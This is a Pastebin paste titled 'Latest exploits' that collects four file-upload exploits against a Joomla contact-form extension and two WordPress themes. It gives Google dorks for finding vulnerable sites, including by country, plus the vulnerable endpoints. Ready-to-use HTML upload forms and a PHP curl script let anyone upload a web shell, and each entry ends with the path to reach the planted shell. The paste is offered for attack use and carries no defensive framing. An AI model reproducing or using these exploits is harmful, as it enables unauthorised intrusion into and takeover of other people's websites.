Advertisement
Kyfx

Latest exploits

Feb 20th, 2015
494
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
  1. #1 Exploit name= com_sexycontactform Shell Vuln Upload
  2. =============================================
  3. Script CSRF :
  4. Code:
  5. <form method="POST" action="http://www.target.com/components/com_sexycontactform/fileupload/index.php"
  6. enctype="multipart/form-data">
  7. <input type="file" name="files[]" /><button>Upload</button>
  8. </form>
  9. Exploit : components/com_sexycontactform/fileupload/index.php
  10. http://www.targetcom/components/com_sexycontactform/fileupload/files/shell.php (root/symlink)
  11. ***************************************************************************
  12.  
  13. #2 Exploit name=Joomla Sexy contact form Arbitrary File Upload Vulnerability
  14. =============================================
  15. Google Dork:
  16. "/components/com_sexycontactform/" site:sy (country name like syria=sy,kyfx=ky.)
  17. "Powered by sexycontact" site:tr(=Turkey,etc etc)
  18. inurl:"sexy-contact-form" site:gr
  19. Exploit : components/com_sexycontactform/fileupload/index.php
  20. Shell Access : http://www.[target].com/components/com_sexycontactform/fileupload/files/shell.php
  21. **************************************************************************
  22. #3 Exploit name=WordPress GoGreen File Upload Vulnerability
  23. =============================================
  24. Google Dork :
  25. inurl:"/wp-content/themes/gogreen/"
  26. Exploit : /wp-content/themes/gogreen/addpress/includes/ap_fileupload.php
  27.  
  28. source code :
  29. Source code:
  30. <h1>Syrian Tiger(Opodarthoz Haxor crewz) GoGreen WordPress Exploit</h1>
  31. <br>
  32. <form enctype="multipart/form-data"
  33. action="http://www.[target].com/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php" method="post">
  34. Home Url: <input name="homeurl" type="text" value="http://" />
  35. </br>
  36. Template: <input name="template" type="text" value="gogreen">
  37. </br>
  38. Dir1: <input name="themeroot" type="text" />
  39. </br>
  40. Dir2: <input name="dir" type="text" />
  41. </br>
  42. File: <input name="file_upload" type="file" /><br />
  43. <input type="submit" value="upload" />
  44. </form>
  45.  
  46. Save as "anyname.html"
  47. Shell Access: http://www.[target].com/wp-content/themes/gogreen/addpress/includes/YourFolderName/YourShell.php (and voila!!!)
  48. ***************************************************************************
  49. #4 Exploit name=WordPress gadgetine-theme File Upload Vulnerability
  50.  
  51. Google Dork : inurl:"wp-content/themes/gadgetine-theme/"
  52.  
  53. Exploit : http://www.[target].com/wp-content/themes/gadgetine-theme/upload-handler.php
  54. source code(php)
  55. <?php
  56. $uploadfile="shell.php";
  57. $ch = curl_init("http://www.[target].com/wp-content/themes/gadgetine-theme/upload-handler.php");
  58. curl_setopt($ch, CURLOPT_POST, true);
  59. curl_setopt($ch, CURLOPT_POSTFIELDS,
  60. array('orange_themes'=>"@$uploadfile"));
  61. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  62. $postResult = curl_exec($ch);
  63. curl_close($ch); print "$postResult";
  64. ?>
  65. Shell Access : http://www.[target].com/wp-content/uploads/2014/10/shell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement